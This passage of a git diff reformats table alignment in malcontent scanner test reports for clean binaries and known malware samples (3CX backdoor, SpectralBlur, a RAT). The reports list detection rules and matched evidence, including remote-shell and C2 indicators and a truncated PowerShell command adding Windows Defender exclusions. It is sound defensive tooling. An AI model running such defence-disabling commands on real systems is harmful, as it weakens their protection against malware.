[Ip](https://github.com/search?q=Ip&type=code) | | MEDIUM | [c2/addr/server](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/server.yara#server_address) | references a 'server address', possible C2 client | [vnc_init_basic_info_from_server_addr](https://github.com/search?q=vnc_init_basic_info_from_server_addr&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index 1b763dcc3..4d891e8bf 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -1,7 +1,7 @@ ## linux/clean/redis-server.aarch64 [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [master_port](https://github.com/search?q=master_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[IP](https://github.com/search?q=IP&type=code) | | MEDIUM | [crypto/openssl](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/openssl.yara#openssl_user) | Uses OpenSSL | [OpenSSL](https://github.com/search?q=OpenSSL&type=code) | | MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | diff --git a/tests/linux/clean/slack.md b/tests/linux/clean/slack.md index f329a66f9..9d76ebfaf 100644 --- a/tests/linux/clean/slack.md +++ b/tests/linux/clean/slack.md @@ -1,7 +1,7 @@ ## linux/clean/slack [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [anti-behavior/LD_DEBUG](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_DEBUG.yara#env_LD_DEBUG) | may check if dynamic linker debugging is enabled | [LD_DEBUG](https://github.com/search?q=LD_DEBUG&type=code) | | MEDIUM | [anti-behavior/LD_PROFILE](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/LD_PROFILE.yara#env_LD_PROFILE) | may check if dynamic linker profiling is enabled | [LD_PROFILE](https://github.com/search?q=LD_PROFILE&type=code) | | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | diff --git a/tests/linux/clean/tree-sitter.md b/tests/linux/clean/tree-sitter.md index d9151254c..e08289779 100644 --- a/tests/linux/clean/tree-sitter.md +++ b/tests/linux/clean/tree-sitter.md 
@@ -1,7 +1,7 @@ ## linux/clean/tree-sitter [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [c2/tool_transfer/dropper](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/dropper.yara#dropper) | References a 'dropper' | [Dropper](https://github.com/search?q=Dropper&type=code) | | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[windows](https://github.com/search?q=windows&type=code)
[Windows](https://github.com/search?q=Windows&type=code)
[http://](http://)
[Darwin](https://github.com/search?q=Darwin&type=code)
[darwin](https://github.com/search?q=darwin&type=code)
[linux](https://github.com/search?q=linux&type=code)
[macOS](https://github.com/search?q=macOS&type=code)
[macos](https://github.com/search?q=macos&type=code) | diff --git a/tests/linux/clean/trufflehog.md b/tests/linux/clean/trufflehog.md index a688d4310..63854e91e 100644 --- a/tests/linux/clean/trufflehog.md +++ b/tests/linux/clean/trufflehog.md @@ -1,7 +1,7 @@ ## linux/clean/trufflehog [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [anti-behavior/vm_check](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/vm-check.yara#vm_checker) | Checks to see if it is running with a VM | [GenuineIntel](https://github.com/search?q=GenuineIntel&type=code)
[VMware](https://github.com/search?q=VMware&type=code) | | MEDIUM | [anti-static/elf/multiple](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/elf/multiple.yara#multiple_elf) | multiple ELF binaries within an ELF binary | `$elf_head` | | MEDIUM | [anti-static/obfuscation/syscall](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/syscall.yara#go_raw_syscall) | invokes raw system calls | [unix.RawSyscall](https://github.com/search?q=unix.RawSyscall&type=code) | diff --git a/tests/linux/clean/viewgam.md b/tests/linux/clean/viewgam.md index a8a13d149..d0041e1e9 100644 --- a/tests/linux/clean/viewgam.md +++ b/tests/linux/clean/viewgam.md @@ -1,7 +1,7 @@ ## linux/clean/viewgam [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[http://](http://)
[windows](https://github.com/search?q=windows&type=code)
[linux](https://github.com/search?q=linux&type=code) | | MEDIUM | [data/embedded/html](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-html.yara#html) | Contains HTML content | [DOCTYPE html](https://github.com/search?q=DOCTYPE+html&type=code)
[](https://github.com/search?q=%3Chtml%3E&type=code) | | MEDIUM | [data/encoding/int](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/int.yara#js_parseInt_Math) | performs math directly against parsed integers | [+parseInt(](https://github.com/search?q=%2BparseInt%28&type=code) | diff --git a/tests/linux/clean/zipdetails.md b/tests/linux/clean/zipdetails.md index 81b0b71db..6cc9fb61d 100644 --- a/tests/linux/clean/zipdetails.md +++ b/tests/linux/clean/zipdetails.md @@ -1,7 +1,7 @@ ## linux/clean/zipdetails [🟡 MEDIUM] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | MEDIUM | [anti-static/obfuscation/hex](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/hex.yara#excessive_hex_refs) | many references to hexadecimal values | [0x10000000](https://github.com/search?q=0x10000000&type=code)
[0x08074b50](https://github.com/search?q=0x08074b50&type=code)
[0x02014b50](https://github.com/search?q=0x02014b50&type=code)
[0x06054b50](https://github.com/search?q=0x06054b50&type=code)
[0x06064b50](https://github.com/search?q=0x06064b50&type=code)
[0x07064b50](https://github.com/search?q=0x07064b50&type=code)
[0x08064b50](https://github.com/search?q=0x08064b50&type=code)
[0x05054b50](https://github.com/search?q=0x05054b50&type=code)
[0xE9F3F9F0](https://github.com/search?q=0xE9F3F9F0&type=code)
[0x7109871a](https://github.com/search?q=0x7109871a&type=code)
[0xf05368c0](https://github.com/search?q=0xf05368c0&type=code)
[0x04034b50](https://github.com/search?q=0x04034b50&type=code)
[0x19DB1DED](https://github.com/search?q=0x19DB1DED&type=code)
[0xFFFFFFFF](https://github.com/search?q=0xFFFFFFFF&type=code)
[0x2146444e](https://github.com/search?q=0x2146444e&type=code)
[0xff3b5998](https://github.com/search?q=0xff3b5998&type=code)
[0x71777777](https://github.com/search?q=0x71777777&type=code)
[0x504b4453](https://github.com/search?q=0x504b4453&type=code)
[0x6dff800d](https://github.com/search?q=0x6dff800d&type=code)
[0x42726577](https://github.com/search?q=0x42726577&type=code)
[0x0065](https://github.com/search?q=0x0065&type=code)
[0x7FFF](https://github.com/search?q=0x7FFF&type=code)
[0x4154](https://github.com/search?q=0x4154&type=code)
[0x4341](https://github.com/search?q=0x4341&type=code)
[0x4453](https://github.com/search?q=0x4453&type=code)
[0x4690](https://github.com/search?q=0x4690&type=code)
[0x4704](https://github.com/search?q=0x4704&type=code)
[0x470f](https://github.com/search?q=0x470f&type=code)
[0x4854](https://github.com/search?q=0x4854&type=code)
[0x4b46](https://github.com/search?q=0x4b46&type=code)
[0x4c41](https://github.com/search?q=0x4c41&type=code)
[0x4d49](https://github.com/search?q=0x4d49&type=code)
[0x4d63](https://github.com/search?q=0x4d63&type=code)
[0x4f4c](https://github.com/search?q=0x4f4c&type=code)
[0x5356](https://github.com/search?q=0x5356&type=code)
[0x5455](https://github.com/search?q=0x5455&type=code)
[0x554e](https://github.com/search?q=0x554e&type=code)
[0x5855](https://github.com/search?q=0x5855&type=code)
[0x5a4c](https://github.com/search?q=0x5a4c&type=code)
[0x5a4d](https://github.com/search?q=0x5a4d&type=code)
[0x6375](https://github.com/search?q=0x6375&type=code)
[0x6542](https://github.com/search?q=0x6542&type=code)
[0x6854](https://github.com/search?q=0x6854&type=code)
[0x7075](https://github.com/search?q=0x7075&type=code)
[0x756e](https://github.com/search?q=0x756e&type=code)
[0x7441](https://github.com/search?q=0x7441&type=code)
[0x7855](https://github.com/search?q=0x7855&type=code)
[0x7875](https://github.com/search?q=0x7875&type=code)
[0x9901](https://github.com/search?q=0x9901&type=code)
[0xa11e](https://github.com/search?q=0xa11e&type=code)
[0xA220](https://github.com/search?q=0xA220&type=code)
[0xCAFE](https://github.com/search?q=0xCAFE&type=code)
[0xfb4a](https://github.com/search?q=0xfb4a&type=code)
[0x0001](https://github.com/search?q=0x0001&type=code)
[0x0007](https://github.com/search?q=0x0007&type=code)
[0x0008](https://github.com/search?q=0x0008&type=code)
[0x0009](https://github.com/search?q=0x0009&type=code)
[0x000a](https://github.com/search?q=0x000a&type=code)
[0x2805](https://github.com/search?q=0x2805&type=code)
[0x8000](https://github.com/search?q=0x8000&type=code)
[0x334d](https://github.com/search?q=0x334d&type=code)
[0x2705](https://github.com/search?q=0x2705&type=code)
[0x2605](https://github.com/search?q=0x2605&type=code)
[0x07c8](https://github.com/search?q=0x07c8&type=code)
[0x0066](https://github.com/search?q=0x0066&type=code)
[0x0023](https://github.com/search?q=0x0023&type=code)
[0x0022](https://github.com/search?q=0x0022&type=code)
[0x0021](https://github.com/search?q=0x0021&type=code)
[0x0020](https://github.com/search?q=0x0020&type=code)
[0x0019](https://github.com/search?q=0x0019&type=code)
[0x0018](https://github.com/search?q=0x0018&type=code)
[0x0017](https://github.com/search?q=0x0017&type=code)
[0x0016](https://github.com/search?q=0x0016&type=code)
[0x000c](https://github.com/search?q=0x000c&type=code)
[0x000d](https://github.com/search?q=0x000d&type=code)
[0x000e](https://github.com/search?q=0x000e&type=code)
[0x000f](https://github.com/search?q=0x000f&type=code)
[0x0014](https://github.com/search?q=0x0014&type=code)
[0x0015](https://github.com/search?q=0x0015&type=code)
[0x01](https://github.com/search?q=0x01&type=code)
[0x1f](https://github.com/search?q=0x1f&type=code)
[0x0f](https://github.com/search?q=0x0f&type=code)
[0x7f](https://github.com/search?q=0x7f&type=code)
[0x03](https://github.com/search?q=0x03&type=code)
[0x20](https://github.com/search?q=0x20&type=code)
[0x3e](https://github.com/search?q=0x3e&type=code)
[0x3f](https://github.com/search?q=0x3f&type=code)
[\x00](https://github.com/search?q=%5Cx00&type=code)
[\x01](https://github.com/search?q=%5Cx01&type=code) | | MEDIUM | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#multiple_os_ref) | references multiple operating systems | [https://](https://)
[http://](http://)
[Windows](https://github.com/search?q=Windows&type=code)
[Darwin](https://github.com/search?q=Darwin&type=code)
[linux](https://github.com/search?q=linux&type=code) | | MEDIUM | [collect/archives/zip](https://github.com/chainguard-dev/malcontent/blob/main/rules/collect/archives/zip.yara#zip) | Works with zip files | [zip files](https://github.com/search?q=zip+files&type=code)
[zipfile](https://github.com/search?q=zipfile&type=code)
[ZIP64](https://github.com/search?q=ZIP64&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff index 1f83074a3..8cada0992 100644 --- a/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.change_decrease.mdiff @@ -3,7 +3,7 @@ ### 22 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | -CRITICAL | [3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16) | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) | | -CRITICAL | [3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275) | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)
`$sa1`
`$sa2`
`$op1`
`$op2` | | -CRITICAL | [3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214) | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`
`$xc2`
`$xc3` | diff --git a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff index a6594bcba..da16ce5fa 100644 --- a/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.change_increase.mdiff @@ -3,7 +3,7 @@ ### 22 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) | | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)
`$sa1`
`$sa2`
`$op1`
`$op2` | | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`
`$xc2`
`$xc3` | diff --git a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff index cfae167e1..005c9cbe4 100644 --- a/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.change_unrelated.mdiff @@ -3,14 +3,14 @@ ### 2 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | +LOW | **[fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts)** | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)
[_fts_close](https://github.com/search?q=_fts_close&type=code)
[_fts_read](https://github.com/search?q=_fts_read&type=code)
[_fts_open](https://github.com/search?q=_fts_open&type=code)
[_fts_set](https://github.com/search?q=_fts_set&type=code) | | +LOW | **[fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink)** | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | ### 14 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | -MEDIUM | [crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt) | encrypts data | [Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code)
[Encryption info](https://github.com/search?q=Encryption+info&type=code) | | -MEDIUM | [fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path) | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | | -MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) | diff --git a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff index a6594bcba..da16ce5fa 100644 --- a/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.dirty.mdiff @@ -3,7 +3,7 @@ ### 22 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) | | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)
`$sa1`
`$sa2`
`$op1`
`$op2` | | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`
`$xc2`
`$xc3` | diff --git a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff index a6594bcba..da16ce5fa 100644 --- a/tests/macOS/2023.3CX/libffmpeg.increase.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.increase.mdiff @@ -3,7 +3,7 @@ ### 22 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | +CRITICAL | **[3P/sekoia/downloader_smooth_operator](https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_mac_smooth_operator.yar#L1-L16)** | Detect the Smooth_Operator malware, by [Sekoia.io](https://github.com/SEKOIA-IO/Community) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code) | | +CRITICAL | **[3P/sig_base/3cxdesktopapp_backdoor](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L251-L275)** | [Detects 3CXDesktopApp MacOS Backdoor component](https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/), by X__Junior (Nextron Systems) | [%s/.main_storage](https://github.com/search?q=%25s%2F.main_storage&type=code)
[%s/UpdateAgent](https://github.com/search?q=%25s%2FUpdateAgent&type=code)
`$sa1`
`$sa2`
`$op1`
`$op2` | | +CRITICAL | **[3P/sig_base/nk_3cx_dylib](https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_mal_3cx_compromise_mar23.yar#L188-L214)** | [Detects malicious DYLIB files related to 3CX compromise](https://www.sentinelone.com/blog/smoothoperator-ongoing-campaign-trojanizes-3cx-software-in-software-supply-chain-attack/), by Florian Roth (Nextron Systems) | `$xc1`
`$xc2`
`$xc3` | diff --git a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff index 69c803731..1e6f61026 100644 --- a/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff +++ b/tests/macOS/2023.3CX/libffmpeg.increase_unrelated.mdiff @@ -3,7 +3,7 @@ ### 14 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | +MEDIUM | **[crypto/encrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/encrypt.yara#encrypt)** | encrypts data | [Encryption initializati](https://github.com/search?q=Encryption+initializati&type=code)
[Encryption info](https://github.com/search?q=Encryption+info&type=code) | | +MEDIUM | **[fs/path/tmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/tmp.yara#tmp_path)** | path reference within /tmp | [/tmp/%sXXXXXX](https://github.com/search?q=%2Ftmp%2F%25sXXXXXX&type=code) | | +MEDIUM | **[impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent)** | references an 'agent' | [user_agent](https://github.com/search?q=user_agent&type=code) | @@ -22,7 +22,7 @@ ### 2 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | -LOW | [fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts) | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)
[_fts_close](https://github.com/search?q=_fts_close&type=code)
[_fts_read](https://github.com/search?q=_fts_read&type=code)
[_fts_open](https://github.com/search?q=_fts_open&type=code)
[_fts_set](https://github.com/search?q=_fts_set&type=code) | | -LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlink](https://github.com/search?q=readlink&type=code) | diff --git a/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md b/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md index 684a43451..0801f1365 100644 --- a/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md +++ b/tests/macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare.md @@ -1,7 +1,7 @@ ## macOS/2024.SpectralBlur.DPRK/SpectralBlur-macshare [🛑 HIGH] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | HIGH | [anti-static/macho/footer](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/macho/footer.yara#high_entropy_trailer) | [higher-entropy machO trailer (normally NULL) - possible viral infection](https://www.virusbulletin.com/virusbulletin/2013/06/multiplatform-madness) | [_PAGEZERO](https://github.com/search?q=_PAGEZERO&type=code) | | HIGH | [impact/remote_access/net_term](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_term.yara#spectralblur_alike) | uploads, provides a terminal, runs program | [tcsetattr](https://github.com/search?q=tcsetattr&type=code)
[_waitpid](https://github.com/search?q=_waitpid&type=code)
[_unlink](https://github.com/search?q=_unlink&type=code)
[execve](https://github.com/search?q=execve&type=code)
[upload](https://github.com/search?q=upload&type=code)
[_uname](https://github.com/search?q=_uname&type=code)
[shell](https://github.com/search?q=shell&type=code) | | MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | diff --git a/tests/macOS/clean/ls.mdiff b/tests/macOS/clean/ls.mdiff index e56ed61a4..f122cac54 100644 --- a/tests/macOS/clean/ls.mdiff +++ b/tests/macOS/clean/ls.mdiff @@ -3,14 +3,14 @@ ### 2 new behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | +LOW | **[fs/directory/traverse](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-traverse.yara#fts)** | traverse filesystem hierarchy | [_fts_children](https://github.com/search?q=_fts_children&type=code)
[_fts_close](https://github.com/search?q=_fts_close&type=code)
[_fts_read](https://github.com/search?q=_fts_read&type=code)
[_fts_open](https://github.com/search?q=_fts_open&type=code)
[_fts_set](https://github.com/search?q=_fts_set&type=code) | | +LOW | **[net/http](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http.yara#http)** | Uses the HTTP protocol | [http](https://github.com/search?q=http&type=code) | ### 6 removed behaviors | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | -MEDIUM | [process/name_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/name-set.yara#__progname) | [get or set the current process name](https://stackoverflow.com/questions/273691/using-progname-instead-of-argv0) | [__progname](https://github.com/search?q=__progname&type=code) | | -LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[x86](https://github.com/search?q=x86&type=code) | | -LOW | [c2/tool_transfer/os](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/os.yara#os_ref) | references a specific operating system | [https://](https://)
[linux](https://github.com/search?q=linux&type=code) | diff --git a/tests/windows/2024.Sharp/sharpil_RAT.exe.md b/tests/windows/2024.Sharp/sharpil_RAT.exe.md index 07f632913..7f600012d 100644 --- a/tests/windows/2024.Sharp/sharpil_RAT.exe.md +++ b/tests/windows/2024.Sharp/sharpil_RAT.exe.md @@ -1,7 +1,7 @@ ## windows/2024.Sharp/sharpil_RAT.exe [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | CRITICAL | [3P/ditekshen/telegramchatbot](https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1293-L1308) | Detects executables using Telegram Chat Bot, by [ditekSHen](https://github.com/ditekshen/detection) | `$s1`
`$s2`
`$s3`
`$s4`
`$p1`
`$p2`
`$p3`
`$p4` | | HIGH | [net/email/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/email/send.yara#SMTPClient_Send_creds) | sends e-mail with a hardcoded credentials | [NetworkCredential](https://github.com/search?q=NetworkCredential&type=code) | | MEDIUM | [c2/addr/discord](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/discord.yara#discord) | may report back to 'Discord' | [Discord](https://github.com/search?q=Discord&type=code) | diff --git a/tests/windows/2024.aspdasdksa2/Nil.exe.md b/tests/windows/2024.aspdasdksa2/Nil.exe.md index a552ac1fe..307d00b1c 100644 --- a/tests/windows/2024.aspdasdksa2/Nil.exe.md +++ b/tests/windows/2024.aspdasdksa2/Nil.exe.md @@ -1,7 +1,7 @@ ## windows/2024.aspdasdksa2/Nil.exe [😈 CRITICAL] | RISK | KEY | DESCRIPTION | EVIDENCE | -|:--:|:--:|:--:|:--:| +|:--|:--|:--|:--| | CRITICAL | [impact/degrade/win_defender](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/degrade/win_defender.yara#win_defender_exclusion) | Uses powershell to define Windows Defender exclusions | [powershell -Command "Add-MpPreference -ExclusionPath 